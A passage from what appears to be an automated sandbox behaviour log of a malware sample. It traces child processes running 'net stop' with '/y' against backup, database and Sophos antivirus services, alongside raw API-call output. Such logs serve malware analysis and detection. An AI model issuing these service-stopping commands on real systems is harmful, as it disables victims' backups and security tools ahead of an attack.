AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 584 os_tid = 0x12f4 Process: id = "194" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x20687000" os_pid = "0x12f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop OracleClientCache80 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 585 os_tid = 0x12fc Process: id = "195" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6d78c000" os_pid = "0x1300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop sms_site_sql_backup /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 586 os_tid = 0x1304 Process: id = "196" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1ac55000" os_pid = "0x1308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "103" os_parent_pid = "0xa88" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 587 os_tid = 0x130c [0114.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fb94 | out: lpSystemTimeAsFileTime=0x31fb94*(dwLowDateTime=0x1828caf0, dwHighDateTime=0x1d6f0d1)) [0114.762] GetCurrentProcessId () returned 0x1308 [0114.762] GetCurrentThreadId () returned 0x130c [0114.762] GetTickCount () returned 0x1150011 [0114.762] QueryPerformanceCounter (in: lpPerformanceCount=0x31fb8c | out: lpPerformanceCount=0x31fb8c*=23386314608) returned 1 [0114.763] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0114.763] __set_app_type (_Type=0x1) [0114.763] __p__fmode () returned 0x770331f4 [0114.763] __p__commode () returned 0x770331fc [0114.763] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0114.763] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0114.763] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.763] GetConsoleOutputCP () returned 0x1b5 [0114.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0114.763] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.766] sprintf_s (in: _DstBuf=0x31fb4c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.767] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.768] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0114.768] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.768] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0114.768] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f918, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0114.768] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x7c) returned 0x7c3af8 [0114.768] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.769] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fb1c | out: Buffer=0x31fb1c*=0x7c1b00) returned 0x0 [0114.769] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fb1c | out: Buffer=0x31fb1c*=0x7c1b18) returned 0x0 [0114.769] _fileno (_File=0x77032900) returned -2 [0114.769] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0114.769] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.769] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.769] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.769] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.769] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.769] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.769] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.769] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.769] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.769] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.769] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.769] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.769] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.769] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.769] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.769] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.769] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.769] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.769] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.769] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.769] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.769] _wcsicmp (_String1="accounts", _String2="BackupExecRPCService") returned -1 [0114.769] _wcsicmp (_String1="computer", _String2="BackupExecRPCService") returned 1 [0114.769] _wcsicmp (_String1="config", _String2="BackupExecRPCService") returned 1 [0114.769] _wcsicmp (_String1="continue", _String2="BackupExecRPCService") returned 1 [0114.769] _wcsicmp (_String1="cont", _String2="BackupExecRPCService") returned 1 [0114.769] _wcsicmp (_String1="file", _String2="BackupExecRPCService") returned 4 [0114.769] _wcsicmp (_String1="files", _String2="BackupExecRPCService") returned 4 [0114.769] _wcsicmp (_String1="group", _String2="BackupExecRPCService") returned 5 [0114.769] _wcsicmp (_String1="groups", _String2="BackupExecRPCService") returned 5 [0114.770] _wcsicmp (_String1="help", _String2="BackupExecRPCService") returned 6 [0114.770] _wcsicmp (_String1="helpmsg", _String2="BackupExecRPCService") returned 6 [0114.770] _wcsicmp (_String1="localgroup", _String2="BackupExecRPCService") returned 10 [0114.770] _wcsicmp (_String1="pause", _String2="BackupExecRPCService") returned 14 [0114.770] _wcsicmp (_String1="session", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="sessions", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="sess", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="share", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="start", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="stats", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="statistics", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="stop", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="time", _String2="BackupExecRPCService") returned 18 [0114.770] _wcsicmp (_String1="user", _String2="BackupExecRPCService") returned 19 [0114.770] _wcsicmp (_String1="users", _String2="BackupExecRPCService") returned 19 [0114.770] _wcsicmp (_String1="msg", _String2="BackupExecRPCService") returned 11 [0114.770] _wcsicmp (_String1="messenger", _String2="BackupExecRPCService") returned 11 [0114.770] _wcsicmp (_String1="receiver", _String2="BackupExecRPCService") returned 16 [0114.770] _wcsicmp (_String1="rcv", _String2="BackupExecRPCService") returned 16 [0114.770] _wcsicmp (_String1="netpopup", _String2="BackupExecRPCService") returned 12 [0114.770] _wcsicmp (_String1="redirector", _String2="BackupExecRPCService") returned 16 [0114.770] _wcsicmp (_String1="redir", _String2="BackupExecRPCService") returned 16 [0114.770] _wcsicmp (_String1="rdr", _String2="BackupExecRPCService") returned 16 [0114.770] _wcsicmp (_String1="workstation", _String2="BackupExecRPCService") returned 21 [0114.770] _wcsicmp (_String1="work", _String2="BackupExecRPCService") returned 21 [0114.770] _wcsicmp (_String1="wksta", _String2="BackupExecRPCService") returned 21 [0114.770] _wcsicmp (_String1="prdr", _String2="BackupExecRPCService") returned 14 [0114.770] _wcsicmp (_String1="devrdr", _String2="BackupExecRPCService") returned 2 [0114.770] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecRPCService") returned 10 [0114.770] _wcsicmp (_String1="server", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="svr", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="srv", _String2="BackupExecRPCService") returned 17 [0114.770] _wcsicmp (_String1="lanmanserver", _String2="BackupExecRPCService") returned 10 [0114.770] _wcsicmp (_String1="alerter", _String2="BackupExecRPCService") returned -1 [0114.771] _wcsicmp (_String1="netlogon", _String2="BackupExecRPCService") returned 12 [0114.771] _wcsupr (in: _String="BackupExecRPCService" | out: _String="BACKUPEXECRPCSERVICE") returned="BACKUPEXECRPCSERVICE" [0114.771] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7c54d8 [0114.773] GetServiceKeyNameW (in: hSCManager=0x7c54d8, lpDisplayName="BACKUPEXECRPCSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x31fab8 | out: lpServiceName="", lpcchBuffer=0x31fab8) returned 0 [0114.774] _wcsicmp (_String1="msg", _String2="BACKUPEXECRPCSERVICE") returned 11 [0114.774] _wcsicmp (_String1="messenger", _String2="BACKUPEXECRPCSERVICE") returned 11 [0114.774] _wcsicmp (_String1="receiver", _String2="BACKUPEXECRPCSERVICE") returned 16 [0114.774] _wcsicmp (_String1="rcv", _String2="BACKUPEXECRPCSERVICE") returned 16 [0114.774] _wcsicmp (_String1="redirector", _String2="BACKUPEXECRPCSERVICE") returned 16 [0114.774] _wcsicmp (_String1="redir", _String2="BACKUPEXECRPCSERVICE") returned 16 [0114.774] _wcsicmp (_String1="rdr", _String2="BACKUPEXECRPCSERVICE") returned 16 [0114.774] _wcsicmp (_String1="workstation", _String2="BACKUPEXECRPCSERVICE") returned 21 [0114.774] _wcsicmp (_String1="work", _String2="BACKUPEXECRPCSERVICE") returned 21 [0114.774] _wcsicmp (_String1="wksta", _String2="BACKUPEXECRPCSERVICE") returned 21 [0114.774] _wcsicmp (_String1="prdr", _String2="BACKUPEXECRPCSERVICE") returned 14 [0114.774] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECRPCSERVICE") returned 2 [0114.774] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECRPCSERVICE") returned 10 [0114.774] _wcsicmp (_String1="server", _String2="BACKUPEXECRPCSERVICE") returned 17 [0114.774] _wcsicmp (_String1="svr", _String2="BACKUPEXECRPCSERVICE") returned 17 [0114.774] _wcsicmp (_String1="srv", _String2="BACKUPEXECRPCSERVICE") returned 17 [0114.774] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECRPCSERVICE") returned 10 [0114.774] _wcsicmp (_String1="alerter", _String2="BACKUPEXECRPCSERVICE") returned -1 [0114.774] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECRPCSERVICE") returned 12 [0114.774] NetServiceControl (in: servername=0x0, service="BACKUPEXECRPCSERVICE", opcode=0x0, arg=0x0, bufptr=0x31fab4 | out: bufptr=0x31fab4) returned 0x889 [0114.930] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0114.930] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0114.931] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0114.932] GetFileType (hFile=0x0) returned 0x0 [0114.932] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7c3ef8 [0114.932] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7c3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n{", lpUsedDefaultChar=0x0) returned 30 [0114.932] WriteFile (in: hFile=0x0, lpBuffer=0x7c3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31f9f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f9f4, lpOverlapped=0x0) returned 0 [0114.932] LocalFree (hMem=0x7c3ef8) returned 0x0 [0114.932] GetFileType (hFile=0x0) returned 0x0 [0114.932] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c61a0 [0114.932] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0114.932] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f9f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f9f4, lpOverlapped=0x0) returned 0 [0114.933] LocalFree (hMem=0x7c61a0) returned 0x0 [0114.933] _ultow (in: _Dest=0x889, _Radix=3275300 | out: _Dest=0x889) returned="2185" [0114.933] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0114.933] GetFileType (hFile=0x0) returned 0x0 [0114.933] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7c61a0 [0114.933] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7c61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0114.933] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31fa00, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fa00, lpOverlapped=0x0) returned 0 [0114.933] LocalFree (hMem=0x7c61a0) returned 0x0 [0114.933] GetFileType (hFile=0x0) returned 0x0 [0114.933] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c61a0 [0114.933] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0114.933] WriteFile (in: hFile=0x0, lpBuffer=0x7c61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fa00, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fa00, lpOverlapped=0x0) returned 0 [0114.933] LocalFree (hMem=0x7c61a0) returned 0x0 [0114.934] NetApiBufferFree (Buffer=0x7c1b00) returned 0x0 [0114.934] NetApiBufferFree (Buffer=0x7c1b18) returned 0x0 [0114.934] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecRPCService /y" [0114.934] exit (_Code=2) Process: id = "197" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x228bd000" os_pid = "0x1384" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "100" os_parent_pid = "0xfc8" cmd_line = "C:\\Windows\\system32\\net1 stop “Sophos AutoUpdate Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 589 os_tid = 0x1388 [0114.804] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff78c | out: lpSystemTimeAsFileTime=0x1ff78c*(dwLowDateTime=0x182fef10, dwHighDateTime=0x1d6f0d1)) [0114.804] GetCurrentProcessId () returned 0x1384 [0114.804] GetCurrentThreadId () returned 0x1388 [0114.804] GetTickCount () returned 0x1150040 [0114.804] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff784 | out: lpPerformanceCount=0x1ff784*=23390480400) returned 1 [0114.804] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0114.804] __set_app_type (_Type=0x1) [0114.804] __p__fmode () returned 0x770331f4 [0114.804] __p__commode () returned 0x770331fc [0114.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0114.805] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0114.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.805] GetConsoleOutputCP () returned 0x1b5 [0114.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0114.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.808] sprintf_s (in: _DstBuf=0x1ff744, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0114.808] setlocale (category=0, locale=".437") returned="English_United States.437" [0114.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0114.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.810] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos AutoUpdate Service” /y" [0114.810] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff510, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0114.810] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x92) returned 0x414ad8 [0114.810] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0114.811] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff714 | out: Buffer=0x1ff714*=0x411b10) returned 0x0 [0114.811] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff714 | out: Buffer=0x1ff714*=0x411b28) returned 0x0 [0114.811] _fileno (_File=0x77032900) returned -2 [0114.811] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0114.811] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0114.811] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0114.811] _wcsicmp (_String1="config", _String2="stop") returned -16 [0114.811] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0114.811] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0114.811] _wcsicmp (_String1="file", _String2="stop") returned -13 [0114.811] _wcsicmp (_String1="files", _String2="stop") returned -13 [0114.811] _wcsicmp (_String1="group", _String2="stop") returned -12 [0114.811] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0114.811] _wcsicmp (_String1="help", _String2="stop") returned -11 [0114.811] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0114.811] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0114.811] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0114.811] _wcsicmp (_String1="session", _String2="stop") returned -15 [0114.811] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0114.811] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0114.811] _wcsicmp (_String1="share", _String2="stop") returned -12 [0114.811] _wcsicmp (_String1="start", _String2="stop") returned -14 [0114.812] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0114.812] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0114.812] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0114.812] _wcsicmp (_String1="accounts", _String2="“Sophos") returned -8123 [0114.812] _wcsicmp (_String1="computer", _String2="“Sophos") returned -8121 [0114.812] _wcsicmp (_String1="config", _String2="“Sophos") returned -8121 [0114.812] _wcsicmp (_String1="continue", _String2="“Sophos") returned -8121 [0114.812] _wcsicmp (_String1="cont", _String2="“Sophos") returned -8121 [0114.812] _wcsicmp (_String1="file", _String2="“Sophos") returned -8118 [0114.812] _wcsicmp (_String1="files", _String2="“Sophos") returned -8118 [0114.812] _wcsicmp (_String1="group", _String2="“Sophos") returned -8117 [0114.812] _wcsicmp (_String1="groups", _String2="“Sophos") returned -8117 [0114.812] _wcsicmp (_String1="help", _String2="“Sophos") returned -8116 [0114.812] _wcsicmp (_String1="helpmsg", _String2="“Sophos") returned -8116 [0114.812] _wcsicmp (_String1="localgroup", _String2="“Sophos") returned -8112 [0114.812] _wcsicmp (_String1="pause", _String2="“Sophos") returned -8108 [0114.812] _wcsicmp (_String1="session", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="sessions", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="sess", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="share", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="start", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="stats", _String2="“Sophos") returned -8105 [0114.812] _wcsicmp (_String1="statistics", _String2="“Sophos") returned -8105 [0114.813] _wcsicmp (_String1="stop", _String2="“Sophos") returned -8105 [0114.813] _wcsicmp (_String1="time", _String2="“Sophos") returned -8104 [0114.813] _wcsicmp (_String1="user", _String2="“Sophos") returned -8103 [0114.813] _wcsicmp (_String1="users", _String2="“Sophos") returned -8103 [0114.935] _wcsicmp (_String1="msg", _String2="“Sophos") returned -8111 [0114.935] _wcsicmp (_String1="messenger", _String2="“Sophos") returned -8111 [0114.935] _wcsicmp (_String1="receiver", _String2="“Sophos") returned -8106 [0114.935] _wcsicmp (_String1="rcv", _String2="“Sophos") returned -8106 [0114.935] _wcsicmp (_String1="netpopup", _String2="“Sophos") returned -8110 [0114.935] _wcsicmp (_String1="redirector", _String2="“Sophos") returned -8106 [0114.935] _wcsicmp (_String1="redir", _String2="“Sophos") returned -8106 [0114.935] _wcsicmp (_String1="rdr", _String2="“Sophos") returned -8106 [0114.935] _wcsicmp (_String1="workstation", _String2="“Sophos") returned -8101 [0114.935] _wcsicmp (_String1="work", _String2="“Sophos") returned -8101 [0114.935] _wcsicmp (_String1="wksta", _String2="“Sophos") returned -8101 [0114.935] _wcsicmp (_String1="prdr", _String2="“Sophos") returned -8108 [0114.936] _wcsicmp (_String1="devrdr", _String2="“Sophos") returned -8120 [0114.936] _wcsicmp (_String1="lanmanworkstation", _String2="“Sophos") returned -8112 [0114.936] _wcsicmp (_String1="server", _String2="“Sophos") returned -8105 [0114.936] _wcsicmp (_String1="svr", _String2="“Sophos") returned -8105 [0114.936] _wcsicmp (_String1="srv", _String2="“Sophos") returned -8105 [0114.936] _wcsicmp (_String1="lanmanserver", _String2="“Sophos") returned -8112 [0114.936] _wcsicmp (_String1="alerter", _String2="“Sophos") returned -8123 [0114.936] _wcsicmp (_String1="netlogon", _String2="“Sophos") returned -8110 [0114.936] _wcsicmp (_String1="accounts", _String2="AutoUpdate") returned -18 [0114.936] _wcsicmp (_String1="computer", _String2="AutoUpdate") returned 2 [0114.936] _wcsicmp (_String1="config", _String2="AutoUpdate") returned 2 [0114.936] _wcsicmp (_String1="continue", _String2="AutoUpdate") returned 2 [0114.936] _wcsicmp (_String1="cont", _String2="AutoUpdate") returned 2 [0114.936] _wcsicmp (_String1="file", _String2="AutoUpdate") returned 5 [0114.936] _wcsicmp (_String1="files", _String2="AutoUpdate") returned 5 [0114.936] _wcsicmp (_String1="group", _String2="AutoUpdate") returned 6 [0114.936] _wcsicmp (_String1="groups", _String2="AutoUpdate") returned 6 [0114.936] _wcsicmp (_String1="help", _String2="AutoUpdate") returned 7 [0114.936] _wcsicmp (_String1="helpmsg", _String2="AutoUpdate") returned 7 [0114.936] _wcsicmp (_String1="localgroup", _String2="AutoUpdate") returned 11 [0114.936] _wcsicmp (_String1="pause", _String2="AutoUpdate") returned 15 [0114.937] _wcsicmp (_String1="session", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="sessions", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="sess", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="share", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="start", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="stats", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="statistics", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="stop", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="time", _String2="AutoUpdate") returned 19 [0114.937] _wcsicmp (_String1="user", _String2="AutoUpdate") returned 20 [0114.937] _wcsicmp (_String1="users", _String2="AutoUpdate") returned 20 [0114.937] _wcsicmp (_String1="msg", _String2="AutoUpdate") returned 12 [0114.937] _wcsicmp (_String1="messenger", _String2="AutoUpdate") returned 12 [0114.937] _wcsicmp (_String1="receiver", _String2="AutoUpdate") returned 17 [0114.937] _wcsicmp (_String1="rcv", _String2="AutoUpdate") returned 17 [0114.937] _wcsicmp (_String1="netpopup", _String2="AutoUpdate") returned 13 [0114.937] _wcsicmp (_String1="redirector", _String2="AutoUpdate") returned 17 [0114.937] _wcsicmp (_String1="redir", _String2="AutoUpdate") returned 17 [0114.937] _wcsicmp (_String1="rdr", _String2="AutoUpdate") returned 17 [0114.937] _wcsicmp (_String1="workstation", _String2="AutoUpdate") returned 22 [0114.937] _wcsicmp (_String1="work", _String2="AutoUpdate") returned 22 [0114.937] _wcsicmp (_String1="wksta", _String2="AutoUpdate") returned 22 [0114.937] _wcsicmp (_String1="prdr", _String2="AutoUpdate") returned 15 [0114.937] _wcsicmp (_String1="devrdr", _String2="AutoUpdate") returned 3 [0114.937] _wcsicmp (_String1="lanmanworkstation", _String2="AutoUpdate") returned 11 [0114.937] _wcsicmp (_String1="server", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="svr", _String2="AutoUpdate") returned 18 [0114.937] _wcsicmp (_String1="srv", _String2="AutoUpdate") returned 18 [0114.938] _wcsicmp (_String1="lanmanserver", _String2="AutoUpdate") returned 11 [0114.938] _wcsicmp (_String1="alerter", _String2="AutoUpdate") returned -9 [0114.938] _wcsicmp (_String1="netlogon", _String2="AutoUpdate") returned 13 [0114.938] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.938] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.938] wcscpy_s (in: _Destination=0x1ff214, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0114.938] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74680000 [0114.939] FormatMessageW 